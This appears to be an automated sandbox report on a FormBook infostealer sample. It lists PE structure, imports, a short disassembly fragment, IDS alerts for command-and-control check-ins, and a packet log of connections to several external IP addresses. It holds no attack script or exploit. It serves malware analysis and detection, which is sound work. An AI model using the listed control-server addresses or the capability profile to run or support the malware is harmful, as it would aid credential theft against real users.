                                                                  jmp 00007F072D2C0D9Ch
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F072D2C0C54h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007F072D2C0A90h
                                                                  bt dword ptr [004BA370h], 01h
                                                                  jc 00007F072D2C0F60h
                                                                  bt dword ptr [004C0158h], 00000000h
                                                                  jnc 00007F072D2C0C2Dh
                                                                  test edi, 00000003h
                                                                  jne 00007F072D2C0C3Eh
                                                                  test esi, 00000003h
                                                                  jne 00007F072D2C0C1Dh
                                                                  bt edi, 02h
                                                                  jnc 00007F072D2C0A8Fh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007F072D2C0A93h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F072D2C0AE5h
                                                                  bt esi, 03h
                                                                  jnc 00007F072D2C0B38h
                                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                  • [RES] VS2012 UPD4 build 61030
                                                                  • [LNK] VS2012 UPD4 build 61030

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f074.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xc40000x5f0740x5f200565c11feacb57375a1cf48e7b038fa56False0.9325337754599211data7.905892692344075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                  RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                  RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                  RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                  RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                  RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                  RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                  RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                  RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                  RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xcc4100x5674bdata1.000327569799194
                                                                  RT_GROUP_ICON0x122b5c0x76dataEnglishGreat Britain0.6610169491525424
                                                                  RT_GROUP_ICON0x122bd40x14dataEnglishGreat Britain1.15
                                                                  RT_VERSION0x122be80xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x122cc40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-22T14:44:49.867696+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849707154.216.76.8080TCP
                                                                  2024-11-22T14:44:49.867696+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849707154.216.76.8080TCP
                                                                  2024-11-22T14:45:07.003448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497093.33.130.19080TCP
                                                                  2024-11-22T14:45:09.629527+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497103.33.130.19080TCP
                                                                  2024-11-22T14:45:12.273605+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497113.33.130.19080TCP
                                                                  2024-11-22T14:45:15.054578+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497123.33.130.19080TCP
                                                                  2024-11-22T14:45:15.054578+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497123.33.130.19080TCP
                                                                  2024-11-22T14:45:21.988359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849713203.161.49.19380TCP
                                                                  2024-11-22T14:45:24.696464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849714203.161.49.19380TCP
                                                                  2024-11-22T14:45:27.401707+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715203.161.49.19380TCP
                                                                  2024-11-22T14:45:30.073486+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849716203.161.49.19380TCP
                                                                  2024-11-22T14:45:30.073486+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849716203.161.49.19380TCP
                                                                  2024-11-22T14:45:36.965532+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497173.33.130.19080TCP
                                                                  2024-11-22T14:45:39.557692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497183.33.130.19080TCP
                                                                  2024-11-22T14:45:42.145120+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497193.33.130.19080TCP
                                                                  2024-11-22T14:45:44.801631+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497203.33.130.19080TCP
                                                                  2024-11-22T14:45:44.801631+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497203.33.130.19080TCP
                                                                  2024-11-22T14:45:51.749224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497213.33.130.19080TCP
                                                                  2024-11-22T14:45:54.510679+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497223.33.130.19080TCP
                                                                  2024-11-22T14:45:57.209645+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497233.33.130.19080TCP
                                                                  2024-11-22T14:45:59.907703+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497243.33.130.19080TCP
                                                                  2024-11-22T14:45:59.907703+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497243.33.130.19080TCP
                                                                  2024-11-22T14:46:06.938463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849725198.252.98.5480TCP
                                                                  2024-11-22T14:46:09.548475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849726198.252.98.5480TCP
                                                                  2024-11-22T14:46:12.157215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727198.252.98.5480TCP
                                                                  2024-11-22T14:46:14.898190+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849728198.252.98.5480TCP
                                                                  2024-11-22T14:46:14.898190+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849728198.252.98.5480TCP
                                                                  2024-11-22T14:46:22.583498+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849729103.224.182.24280TCP
                                                                  2024-11-22T14:46:25.163977+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849730103.224.182.24280TCP
                                                                  2024-11-22T14:46:27.865598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849731103.224.182.24280TCP
                                                                  2024-11-22T14:46:30.465806+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849732103.224.182.24280TCP
                                                                  2024-11-22T14:46:30.465806+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849732103.224.182.24280TCP
                                                                  2024-11-22T14:46:38.032785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849733154.23.184.21880TCP
                                                                  2024-11-22T14:46:40.704853+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849734154.23.184.21880TCP
                                                                  2024-11-22T14:46:43.360922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735154.23.184.21880TCP
                                                                  2024-11-22T14:46:46.133779+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849736154.23.184.21880TCP
                                                                  2024-11-22T14:46:46.133779+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849736154.23.184.21880TCP
                                                                  2024-11-22T14:46:53.207473+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973731.31.196.1780TCP
                                                                  2024-11-22T14:46:55.800508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973831.31.196.1780TCP
                                                                  2024-11-22T14:46:58.697237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973931.31.196.1780TCP
                                                                  2024-11-22T14:47:01.304688+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974031.31.196.1780TCP
                                                                  2024-11-22T14:47:01.304688+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84974031.31.196.1780TCP
                                                                  2024-11-22T14:47:08.567712+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974164.190.63.22280TCP
                                                                  2024-11-22T14:47:11.826466+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974264.190.63.22280TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 22, 2024 14:44:48.170980930 CET4970780192.168.2.8154.216.76.80
                                                                  Nov 22, 2024 14:44:48.290842056 CET8049707154.216.76.80192.168.2.8
                                                                  Nov 22, 2024 14:44:48.290934086 CET4970780192.168.2.8154.216.76.80
                                                                  Nov 22, 2024 14:44:48.298755884 CET4970780192.168.2.8154.216.76.80
                                                                  Nov 22, 2024 14:44:48.418308020 CET8049707154.216.76.80192.168.2.8
                                                                  Nov 22, 2024 14:44:49.867388964 CET8049707154.216.76.80192.168.2.8
                                                                  Nov 22, 2024 14:44:49.867465973 CET8049707154.216.76.80192.168.2.8
                                                                  Nov 22, 2024 14:44:49.867696047 CET4970780192.168.2.8154.216.76.80
                                                                  Nov 22, 2024 14:44:49.872209072 CET4970780192.168.2.8154.216.76.80
                                                                  Nov 22, 2024 14:44:49.992161989 CET8049707154.216.76.80192.168.2.8
                                                                  Nov 22, 2024 14:45:05.737591982 CET4970980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:05.857315063 CET80497093.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:05.857486963 CET4970980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:05.868563890 CET4970980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:05.988437891 CET80497093.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:07.003319979 CET80497093.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:07.003448009 CET4970980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:07.376720905 CET4970980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:07.499356985 CET80497093.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:08.396285057 CET4971080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:08.515964985 CET80497103.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:08.516064882 CET4971080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:08.530750990 CET4971080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:08.650362015 CET80497103.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:09.629456043 CET80497103.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:09.629527092 CET4971080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:10.032658100 CET4971080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:10.159288883 CET80497103.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:11.051498890 CET4971180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:11.174329042 CET80497113.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:11.174442053 CET4971180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:11.188309908 CET4971180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:11.308115005 CET80497113.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:11.308129072 CET80497113.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:12.273524046 CET80497113.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:12.273605108 CET4971180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:12.707086086 CET4971180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:12.832832098 CET80497113.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:13.729852915 CET4971280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:13.851943970 CET80497123.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:13.852605104 CET4971280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:13.862771034 CET4971280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:13.982309103 CET80497123.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:15.054389954 CET80497123.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:15.054500103 CET80497123.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:15.054578066 CET4971280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:15.058794975 CET4971280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:15.178498030 CET80497123.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:20.641294003 CET4971380192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:20.761279106 CET8049713203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:20.761464119 CET4971380192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:20.776297092 CET4971380192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:20.895860910 CET8049713203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:21.988147020 CET8049713203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:21.988270044 CET8049713203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:21.988358974 CET4971380192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:22.282715082 CET4971380192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:23.302525043 CET4971480192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:23.422454119 CET8049714203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:23.422671080 CET4971480192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:23.435933113 CET4971480192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:23.555372000 CET8049714203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:24.696316957 CET8049714203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:24.696399927 CET8049714203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:24.696464062 CET4971480192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:24.939084053 CET4971480192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:25.959274054 CET4971580192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:26.079114914 CET8049715203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:26.079272985 CET4971580192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:26.137670994 CET4971580192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:26.257467985 CET8049715203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:26.257585049 CET8049715203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:27.401501894 CET8049715203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:27.401572943 CET8049715203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:27.401706934 CET4971580192.168.2.8203.161.49.193
